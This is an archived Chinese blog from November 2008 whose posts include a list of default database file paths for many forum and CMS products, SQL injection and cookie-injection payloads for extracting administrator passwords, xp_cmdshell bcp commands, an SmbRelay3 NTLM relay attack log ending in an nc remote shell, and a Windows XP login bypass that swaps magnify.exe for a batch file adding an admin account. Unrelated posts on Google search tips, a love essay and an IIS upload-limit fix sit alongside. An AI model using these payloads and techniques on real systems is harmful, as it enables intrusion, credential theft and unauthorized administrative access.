2008年11月29日星期六

各大数据库默认地址 Default Database Address

/data/dvbbs7.mdb 动网论坛数据库
/databackup/dvbbs7.mdb 动网论坛数据库
/bbs/databackup/dvbbs7.mdb 动网论坛数据库
/admin/data/qcdn_news.mdb 青创文章管理系统数据库
/data/qcdn_news.mdb 青创文章管理系统数据库
/firend.mdb 交友中心数据库
/database/NewCloud6.mdb 新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库
/database\yiuwekdsodksldfslwifds.mdb动力文章系统数据库

/database/article.asp 贫龙文章管理系统
/data/dvbbs7.mdb 动网论坛数据库 7.X
/databackup/dvbbs7.mdb 动网论坛默认备份数据库 7.0-7.1
/data/dvbbs8.mdb 动网论坛数据库 8.0
/admin/data/qcdn_news.mdb 青创文章管理系统数据库
/data/qcdn_news.mdb 青创文章管理系统数据库
/firend.mdb 交友中心数据库
/database/NewCloud6.mdb 新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/database/PowerEasy5.mdb 动易网站管理系统5.X数据库
/database/PowerEasy6.mdb 动易网站管理系统6X数据库
/database/PowerEasy2006.mdb 动易网站管理系统2006数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库


/register/userreg_setp2.asp科讯CMS注册可上传小马
upfile_photo.asp
Upfile_Soft.asp
upfile_flash.asp
powered by mypower
upfile_other.asp
data/scadata.mdb
/db/com02.mdb
/User/UserReg.asp

SQL入侵必学语句大全

SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions
/*动态文件名
declare @fn varchar(20),@s varchar(1000)
set @fn = 'c:\test.xls'
set @s ='''Microsoft.Jet.OLEDB.4.0'',
''Data Source="'+@fn+'";User ID=Admin;Password=;Extended properties=Excel 5.0'''
set @s = 'SELECT * FROM OpenDataSource ($'">'+@s+')...sheet1$'
exec(@s)
*/

SELECT cast(cast(科目编号 as numeric(10,2)) as nvarchar(255))+' ' 转换后的别名
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

/********************** EXCEL导到远程SQL
insert OPENDATASOURCE(
'SQLOLEDB',
'Data Source=远程ip;User ID=sa;Password=密码'
).库名.dbo.表名 (列名1,列名2)
SELECT 列名1,列名2
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions


/** 导入文本文件
EXEC master..xp_cmdshell 'bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword'

/** 导出文本文件
EXEC master..xp_cmdshell 'bcp dbname..tablename out c:\DT.txt -c -Sservername -Usa -Ppassword'

EXEC master..xp_cmdshell 'bcp "Select * from dbname..tablename" queryout c:\DT.txt -c -Sservername -Usa -Ppassword'

导出到TXT文本,用逗号分开
exec master..xp_cmdshell 'bcp "库名..表名" out "d:\tt.txt" -c -t ,-U sa -P password'


BULK INSERT 库名..表名
FROM 'c:\test.txt'
WITH (
FIELDTERMINATOR = ';',
ROWTERMINATOR = '\n'
)


--/* dBase IV文件
select * from
OPENROWSET('MICROSOFT.JET.OLEDB.4.0'
,'dBase IV;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料4.dbf]')
--*/

--/* dBase III文件
select * from
OPENROWSET('MICROSOFT.JET.OLEDB.4.0'
,'dBase III;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料3.dbf]')
--*/

--/* FoxPro 数据库
select * from openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\',
'select * from [aa.DBF]')
--*/

/**************导入DBF文件****************/
select * from openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;
SourceDB=e:\VFP98\data;
SourceType=DBF',
'select * from customer where country != "USA" order by country')
go
/***************** 导出到DBF ***************/
如果要导出数据到已经生成结构(即现存的)FOXPRO表中,可以直接用下面的SQL语句

insert into openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\',
'select * from [aa.DBF]')
select * from 表

说明:
SourceDB=c:\ 指定foxpro表所在的文件夹
aa.DBF 指定foxpro表的文件名.


/*************导出到Access********************/
insert into openrowset('Microsoft.Jet.OLEDB.4.0',
'x:\A.mdb';'admin';'',A表) select * from 数据库名..B表

/*************导入Access********************/
insert into B表 selet * from openrowset('Microsoft.Jet.OLEDB.4.0',
'x:\A.mdb';'admin';'',A表)

文件名为参数
declare @fname varchar(20)
set @fname = 'd:\test.mdb'
exec('SELECT a.* FROM opendatasource(''Microsoft.Jet.OLEDB.4.0'',
'''+@fname+''';''admin'';'''', topics) as a ')

SELECT *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="f:\northwind.mdb";Jet OLEDB:Database Password=123;User ID=Admin;Password=;')...产品

********************* 导入 xml 文件

DECLARE @idoc int
DECLARE @doc varchar(1000)
--sample XML document
SET @doc ='



Customer was very satisfied




Important
Happy Customer.




'
-- Create an internal representation of the XML document.
EXEC sp_xml_preparedocument @idoc OUTPUT, @doc

-- Execute a SELECT statement using OPENXML rowset provider.
SELECT *
FROM OPENXML (@idoc, '/root/Customer/Order', 1)
WITH (oid char(5),
amount float,
comment ntext 'text()')
EXEC sp_xml_removedocument @idoc


???????

/**********************Excel导到Txt****************************************/
想用
select * into opendatasource(...) from opendatasource(...)
实现将一个Excel文件内容导入到一个文本文件

假设Excel中有两列,第一列为姓名,第二列为很行帐号(16位)
且银行帐号导出到文本文件后分两部分,前8位和后8位分开。


邹健:
如果要用你上面的语句插入的话,文本文件必须存在,而且有一行:姓名,银行账号1,银行账号2
然后就可以用下面的语句进行插入
注意文件名和目录根据你的实际情况进行修改.

insert into
opendatasource('MICROSOFT.JET.OLEDB.4.0'
,'Text;HDR=Yes;DATABASE=C:\'
)...[aa#txt]
--,aa#txt)
--*/
select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8)
from
opendatasource('MICROSOFT.JET.OLEDB.4.0'
,'Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls'
--,Sheet1$)
)...[Sheet1$]


如果你想直接插入并生成文本文件,就要用bcp

declare @sql varchar(8000),@tbname varchar(50)

--首先将excel表内容导入到一个全局临时表
select @tbname='[##temp'+cast(newid() as varchar(40))+']'
,@sql='select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8)
into '+@tbname+' from
opendatasource(''MICROSOFT.JET.OLEDB.4.0''
,''Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls''
)...[Sheet1$]'
exec(@sql)

--然后用bcp从全局临时表导出到文本文件
set @sql='bcp "'+@tbname+'" out "c:\aa.txt" /S"(local)" /P"" /c'
exec master..xp_cmdshell @sql

--删除临时表
exec('drop table '+@tbname)
/********************导整个数据库*********************************************/

用bcp实现的存储过程


/*
实现数据导入/导出的存储过程
根据不同的参数,可以实现导入/导出整个数据库/单个表
调用示例:
--导出调用示例
----导出单个表
exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',1
----导出整个数据库
exec file2table 'zj','','','xzkh_sa','C:\docman',1

--导入调用示例
----导入单个表
exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',0
----导入整个数据库
exec file2table 'zj','','','xzkh_sa','C:\docman',0

*/
if exists(select 1 from sysobjects where name='File2Table' and objectproperty(id,'IsProcedure')=1)
drop procedure File2Table
go
create procedure File2Table
@servername varchar(200) --服务器名
,@username varchar(200) --用户名,如果用NT验证方式,则为空''
,@password varchar(200) --密码
,@tbname varchar(500) --数据库.dbo.表名,如果不指定:.dbo.表名,则导出数据库的所有用户表
,@filename varchar(1000) --导入/导出路径/文件名,如果@tbname参数指明是导出整个数据库,则这个
参数是文件存放路径,文件名自动用
表名.txt
,@isout bit --1为导出,0为导入
as
declare @sql varchar(8000)

if @tbname like '%.%.%' --如果指定了表名,则直接导出单个表
begin
set @sql='bcp '+@tbname
+case when @isout=1 then ' out ' else ' in ' end
+' "'+@filename+'" /w'
+' /S '+@servername
+case when isnull(@username,'')='' then '' else ' /U '+@username end
+' /P '+isnull(@password,'')
exec master..xp_cmdshell @sql
end
else
begin --导出整个数据库,定义游标,取出所有的用户表
declare @m_tbname varchar(250)
if right(@filename,1)<>'\' set @filename=@filename+'\'

set @m_tbname='declare #tb cursor for select name from '+@tbname+'..sysobjects where xtype=''U'''
exec(@m_tbname)
open #tb
fetch next from #tb into @m_tbname
while @@fetch_status=0
begin
set @sql='bcp '+@tbname+'..'+@m_tbname
+case when @isout=1 then ' out ' else ' in ' end
+' "'+@filename+@m_tbname+'.txt " /w'
+' /S '+@servername
+case when isnull(@username,'')='' then '' else ' /U '+@username end
+' /P '+isnull(@password,'')
exec master..xp_cmdshell @sql
fetch next from #tb into @m_tbname
end
close #tb
deallocate #tb
end
go

/************* Oracle **************/
EXEC sp_addlinkedserver 'OracleSvr',
'Oracle 7.3',
'MSDAORA',
'ORCLDB'
GO

delete from openquery(mailser,'select * from yulin')

select * from openquery(mailser,'select * from yulin')

update openquery(mailser,'select * from yulin where id=15')set disorder=555,catago=888

insert into openquery(mailser,'select disorder,catago from yulin')values(333,777)


补充:

对于用bcp导出,是没有字段名的.

用openrowset导出,需要事先建好表.

用openrowset导入,除ACCESS及EXCEL外,均不支持非本机数据导入

手工注入猜解语句

自己在学习过程中总结的一些东西,在这发出来,希望对看到的人能有所帮助吧!
猜解表名:
and exists (select * from 表名)
猜解列名:
and exists (select 字段 from 表名)
UNION法:
联合查询:
select name,password,id from user union select user,pwd,uid from
爆指定表名内容:
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解码法:
1、猜解列长度
猜解语句:
and (select top 1 len(列名)from 表名)>N
and (select top 1 len(列名)from 表名)=N
其中N是数字,变换这个N的值猜解列长度,例如:
and (select top 1 len(列名)from 表名)>1
and (select top 1 len(列名)from 表名)>6
如果一直猜到6都显示正常页面,猜到7的时候返回错误(大于6并且小于等于7),那么该列的长度为7。因为“top 1”的意思是把最靠前的1条记录给提取出来,所以如果要猜解第二条记录就该使用:
select top 1 len(列名) from 表名
where 列名 not in (select top 1 列名 from 表名)
2、ASCII码分析法猜解用户和密码
ASC()函数和Mid函数
例如:mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码
猜解语句为:
and (select top 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换)
区间判断语句:
“......between......and......”
中文处理法:
当ASCII转换后为“负数”使用abs()函数取绝对值。
例:and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换)
ASCII逐字解码法的应用:
1、猜解表名:
and (select count(*) from admin)<>0
2、猜解列名:
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数:
and (select count(*) from 表名)=1
返回正常,表中有一条记录。
4、猜解管理员用户名的长度:
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名:
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交:
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码:
按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句:
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。

cookie注入语句:
javascript:alert(document.cookie="id="+escape("44 and 1=1"));
javascript:alert(document.cookie="id="+escape("44 and 1=2"));
猜解语句:
猜解长度:
javascript:alert(document.cookie="id="+escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascript:alert(document.cookie="id="+escape("44 and (select asc(mid(username)) from admin)=97"))

2008年11月28日星期五

MS08-068 Exploit

Introduction

Most Windows networks still support insecure authentication schemes by default. This is for example what happends with NTLM who is enable by default until lastest Windows Vista.

NTLM allows users to reply incomming connections against third part systems, and authenticate themselves without knowing the password. Therefore, connecting to a system with NTLM means that you can be owned.

This authentication scheme is used on a variety of protocols, like HTTP. There is also a windows feature that allows your internet browser (iexplore) or the system (explorer) to automatically send your credentials against a network server if the server requires authentication.

If you are able to force remote users to connect to your system (HTTP or SMB) with dns attacks (poisoning,..), social engineering, email link, msn http link, xss, shutting down valid servers and getting the server ip address, or deploying some kind of malicous payload theorically, the network belongs to you. To exploit those security flaws, we have developed a new security tool named SmbRelay 3 that at this time is able to relay both HTTP and SMB authentication.

Smbrelay3 is the first public tool that allows those kinds of attacks. This version also includes an small SMB library for creating crafted messages so, if the incomming connection has Administrative privileges on the client computer, you will automatically get a shell.





Currently the following attacks are implemented:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

* Psexec Module: If you already know username and password you can get a shell to the remote computer. This psexec like tool works under win32 and linux as do not use Microsoft API.

* Fake interface:Under linux, a new port 445 binding is done under a different ip address. All packets sent to that interface will be replayed to the previously authenticated system.



Details

If gathered credentials have administration privileges on the target system, under those scenarios you will automatically get a remote shell to the target system. There are also two additional features:

To allow the user to automatically get a remote shell smbrelay needs to send raw smb messages to the SMB server. Thats why smbrelay3 implements its own smb library for creating special crafted packets.





Smbrelay is able to send the following smb requests:

#define SMBCLOSE 0x04
#define SERVICEOPERATION 0x25
#define READANDX 0x2e
#define WRITEANDX 0x2f
#define FINDFIRST2 0x32
#define SESSIONSETUPANDX 0x73
#define TREECONNETANDX 0x75
#define NTCREATEANDX 0xa2

For more information just read the readme file


Attack Example:

C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


Special thanks goes to Iñaki Lopez for developing the NTLM library.


Update Microsoft has released MS08-068 limitating this vulnerability to be exploited only against the same workstation and under the same protocol. Enjoy :)



+ Download (Windows executable + Source code)
+ Browse source code online
+ Paper Download Spanish Paper (Presented at Lac0n security congress)

成功绕过XP登陆密码

有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼,现在我就来给你带来解决的方法.
所需工具
1.U盘一个
2.Usboot(U盘启动制作软件)
3.winrar(压缩软件)
这个方法我亲自实验过,并且成功的绕过了XP的登陆密码.我在学校机房做过实验,但是文件格式为FAT32,就不知道NTFS的行不行?本来想一起实验 的,结果我的光驱在学校机器上用不起(我的光驱有问题,机器太老了!--穷),学校的机器都是FAT32的,没办法!只有下次做了!
先说说思路:方法很简单,当你的机器出现登陆框,要求输入密码时,你按下windows键+U看看有什么反映……?不错!出现了辅助工具管理工具(呵 呵~~意味着可以运行放大镜)。既然可以运行放大镜程序,那么我们把放大镜程序换成其他的程序是不是也可以运行呢?(我把它换成添加用户的程序不 就…………呵呵~~好坏!)思路就是这样的了!现在我们开始制作。
①.制作U盘启动盘。先运行Usboot,然后插入U盘,选中U盘然后点开始。(要破坏U盘上的文件哦!小心!),格式化完了把U盘拔了,然后它会提示你再插入,插入U盘1分后就可以了!我的U盘是1G的,用的HDD格式。
②.制作替换文件。要制作一个XX.EXE的文件来替换原文件,但是这个XX.EXE执行后又要达到添加用户的要求。我首先想到的是写一个批处理文件:

@net user haggy 123456 /add
@net localgroup administrators haggy /add
@exit

然后保存为XX.bat就可以了!
又有人要问我了,我们要的是XX.EXE你却给我们弄个XX.bat你什么意思嘛?
问得好!我们让它运行XX.EXE就等同运行了XX.bat不就可以了嘛!
要达到这样的目的,就要用到winrar,用winrar制作一个自解压文件,不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到 U 盘上去)
③.替换文件.到COMS里去把第一启动换到USB-HDD,保存----插入U盘,进入系统的c:\windows\system32下去. copy magnify.exe 007magnify.exe (对magnify.exe进行备份,magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下,并该为 magnify.exe就可以了!
然后从硬盘启动就可以了!再到XP登陆密码时,你只要运行放大镜就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用户就可以进去了!进去把管理员密码改过来吧!
这样就成功的绕过了XP的登陆密码,只要了一个U盘,好方便.

2008年11月27日星期四

寿命计算器

寿命计算器的地址是:http://100.51daifu.com/

没事可以算一下.

20条让Google搜索更有效的技巧

google已经成为一个不可或缺的搜索工具,每天被数百万人使用,并渗透到生活的所有层面。无论是工作或学习、研究、寻找电影以及名人的八卦新闻。
本文介绍了20条简单有趣的技巧,让你告别以往费时费力的搜索习惯。从现在起,Tips你的“搜”能力吧!

对上百万人而言,Google是一个每天都要用到的、生活各方面都要用上的不可或缺的搜索工具。从工作、学校、研究、到查找电影、名人、新闻、八卦,Google是一个万事通型的搜索引擎。
除了仅仅输入一个词组然后费力地在一页又一页的搜索结果里查找答案,还有一些方法能让你的搜索更加有效。

这些方法中,有些是众所周知的,你也可能了解的。但有些方法不为人熟知,还有些是大家知道但很少用上的。本文将让你了解更多或记起一些这种能更快更准确地找到答案的最佳方法。

  1. 。Google通常会查找搜索框内输入的所有字词都包含的页面,但如果你希望页面里只含有这个或那个词(或者两个都有),就要用“OR“操作符——或者用”|“符号(管道符号),这样可以少敲几次键盘。例如[dumb | little | man]。
  2. 双引号。如果你希望精确搜索一个短语,给它加上双引号。["dumb little man"]会查出只包含整个词组的页面。[dumb "little man"]则会列出包含dumb这个词和"little man"这个词组的页面。
  3. 不包含。如果你不需要某个词或词组,在它前面加上“-”号。[-dumb little man]会返回包含“little"和"man"但不包含"dumb"的页面。
  4. 近义词。使用“~”号可以返回意义相近的词语。[~dumb little man -dumb]可得到包含“funny little man"和"stupid little man"但不包含“dumb little man"的页面。
  5. 通配符。 “*”号是一个通配符。如果你想查找一首歌的歌词,但记不起具体的歌词时这个方法很有用。 [can't * me love lyrics]会返回你要查找的披头士的歌词。另外当你希望只在某个领域(如教育类信息)中搜索时也可以用这个方法:["dumb little man" research *.edu]
  6. 高级搜索。如果你记不住这些操作符,你还可以随时使用Google的高级搜索
  7. 定义。使用“define:"操作符可以快速地得到某个字词的定义。[define:dumb]会给你列出一大堆对“dumb"这个词的来自各种链接的定义。
  8. 计算器。这是Google最方便的用法之一,在搜索框里输入一条算式就可以很快地得到计算结果。大多数时候比你调用电脑里的计算器程序还要快。用+、-、*、/这些符号和括号就可以做出一条算式。
  9. 数字范围搜索。这个不为人熟知的技巧是用来对某个范围的数字进行搜索。例如,["best books 2002..2007]会列出2002年到2007年间每年最好的书(注意两个数字间有两个英文句号)。
  10. 站内搜索。使用“site:"操作符可以只在指定网站内搜索。[site:dumblittleman.com leo]会只在这个网站里查找包含“leo“这个词的页面。
  11. 反向链接。“link:"操作符可以查出链接至某个网址(URL)的页面。你可以用来查某个主网址,甚至是某个特定的网页。但并不是所有的反向链接都会列出。
  12. 垂直搜索。这个技巧是用来在某个专业领域内,而不是在网络上所有网页里搜索。Google提供了几种特定搜索的方法,可以在博客、新闻、图书等领域内搜索:
  13. 博客搜索
  14. 图书搜索
  15. 学术搜索
  16. 商品搜索
  17. 代码搜索
  18. 网页目录
  19. 财经资讯
  20. 图片搜索
  21. 本地地图
  22. 新闻
  23. 专利搜索
  24. 产品搜索
  25. 视频搜索
  26. 电影。使用"movie:"操作符可以查找电影字幕,如果加上邮政编码或美国的城市名和州名还可得到在该地区的电影院名单和电影放映时间。
  27. 音乐。"music:"操作符可以返回只与音乐相关的内容。
  28. 单位换算。用Google可以做快速的换算,比如将码换算成米,或不同货币间的换算:[12 meters in yards]。
  29. 数字类型:Google的算法可以识别你输入的数字类型,所以你可以搜索:
  30. 电话区号
  31. 车辆识别码(仅适用于美国)
  32. 联邦通讯委员会(FCC)设备编码(仅适用于美国)
  33. 环球产品代码(UPC)
  34. 联邦航空管理局(FAA)飞机登记号(仅适用于美国)
  35. 专利号(仅适用于美国)
  36. 甚至是股票价格(使用股票代码)或最近五天的天气预报
  37. 文件类型。例如,如果你只想查找.PDF文件、Word文档、或EXCEL表格,就可以使用"filetype:"操作符。
  38. 关键词位置。 默认情况下,Google会在整个网页里查找你的关键词。但如果你只想在某个位置里查找,就要用 到"inurl:"、“intitle:"、"intext:"和"inanchor:"这些操作符。它们能让搜索只在网址、网页标题、主体文本和链接锚 文本(用于描述链接的文本)里进行。
  39. 缓存页面。查找Google在其服务器上存储的某个页面的版本?这个技巧可以帮你查找以前的或更新的页面:使用"cached:"操作符。
  40. 生命、宇宙及任何事物的终极答案。用小写字母输入这个短语(Answer to life, the universe, and everything),Google会给你答案

2008年11月26日星期三

男人的真爱只有一次——女人,你珍惜了吗

人们长说痴男怨女,古人已经解释的很清楚了,痴男,男人对爱的痴情,对感情的专一也只有男人自己才知道。女人一辈子可爱上多个男人,而男人却可以同时爱上多个女人,可女人却不知道其实男人一辈子只爱过一个!
  男人真正纯洁的爱只有一次的,当那次爱来了,他会不顾一切,当那次爱死了,也就不会再有了,那次爱的太深,然而痛的也太深。
  所以那次之后男人的爱也就麻木了.男人以后也会爱上别的女孩,只是那种爱却已不再纯洁,包含了欲望,包含了同情,包含了怜惜~~~~~
  女人的心都是水做的,然而最毒也妇人心,所以受伤最多的是女人,伤人最深的也是女人。女人的爱可以有很多次,而男人却永远只有一次的,男人遇到那个最爱的女孩之后把所有的爱都给了她,可有多少女孩懂的珍惜。
  于是男人哭了,男人流泪了,伤心至极而绝望的泪水,慢慢的男人开始亲手去埋葬自己那唯一的爱,把它尘封在自己心底最深处的某个深渊。
  可当夜深人静的时候,他会疯狂的跳进那个深渊,妄图去寻找那次爱的痕迹,哪怕是一丝丝一点点,可结果却跟以往一样的一无所获,只留下自己独自缩在黑暗的角落孤独的一根根抽着寂寞的烟,孤独的流着伤心的泪水。
  当然女人埋怨着男人的花心的时候是否曾想过,男人最珍贵的东西也正是被你们无情的毁灭,当男人羞涩的说着我爱你的时候你珍惜了吗?当男人为你流泪的时候你帮他擦拭了吗?当男人乞求你别离开的时候你回头了吗?
 都说男人花心,可女人何曾知道,男人的花心是因为痴心,爱极而痴,痴极而痛,痛极而死.这次爱灰飞烟灭后男人对爱的心就死了,男人再也不会对女人真心的付出真正的好了,没有了心劲,没有了激情,不再相信真正的爱情,对爱总带着点玩世不恭,有些事,一辈子只有一次。
  当男人全心爱过一个人之后,该付出的付出了,全心努力的去把握过,曾试图给她想要的一切,曾试图为她而死,但回报却是无动于衷,于是在一次次寂寞的等待中,心血一点一滴的滴干了,最后心血全无,心灰意冷,当爱情失去信仰,当感情离开忠一的港湾后,对于男人来说,爱情是什么这一切就都显的无所谓了!男人的心冷了,就再也难以热起来,因为爱过一次之后已经让他失去了爱的能力。
  男人这一生中,最爱的女人真的只有一个,男人自己心里最清楚,如果你是,你能感觉的到吗?感觉到了,请你珍惜!好吗?

[无错版]win2003上传不能超过200k的解决办法(VBS脚本程序法,手动修改法)

来源:http://www.yongfa365.com
原因:
在 IIS 6.0 中,默认设置是特别严格和安全的,这样可以最大限度地减少因以前太宽松的超时和限制而造成的攻击。
配置数据库属性实施的最大 ASP 张贴大小为 204,800 个字节,并将各个字段限制为 100 KB。在 IIS 6.0 之前的版本中,没有这个限制。
view plaincopy to clipboardprint?

1. '把这段代码复制到记事本里然后保存为:win2003-200K.vbs,看好了扩展名为.vbs
2. Set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
3. Set vdirObj=providerObj.Get("IIsWebServiceSetting='W3SVC'")
4. WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
5. vdirObj.AspMaxRequestEntityAllowed=20480000 '可接收多大字节,此处默认为:204800即:200K
6. vdirObj.Put_()
7. WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

'把这段代码复制到记事本里然后保存为:win2003-200K.vbs,看好了扩展名为.vbs
Set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
Set vdirObj=providerObj.Get("IIsWebServiceSetting='W3SVC'")
WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
vdirObj.AspMaxRequestEntityAllowed=20480000 '可接收多大字节,此处默认为:204800即:200K
vdirObj.Put_()
WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

以前在网上看到过以下代码(以下代码是错的,如要直接使用,请使用上边提供的):
view plaincopy to clipboardprint?

1. set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
2. set vdirObj=providerObj.get("IIsWebVirtualDirSetting='W3SVC/1/ROOT'")
3. '输出当前值:
4. WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
5. '设置属性:
6. vdirObj.AspMaxRequestEntityAllowed=204800000' 将属性更改保存在配置数据库中:
7. vdirObj.Put_()
8. '输出更改后的值
9. WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

set providerObj=GetObject("winmgmts:/root/MicrosoftIISv2")
set vdirObj=providerObj.get("IIsWebVirtualDirSetting='W3SVC/1/ROOT'")
'输出当前值:
WScript.Echo "Before: " & vdirObj.AspMaxRequestEntityAllowed
'设置属性:
vdirObj.AspMaxRequestEntityAllowed=204800000' 将属性更改保存在配置数据库中:
vdirObj.Put_()
'输出更改后的值
WScript.Echo "Now: " & vdirObj.AspMaxRequestEntityAllowed

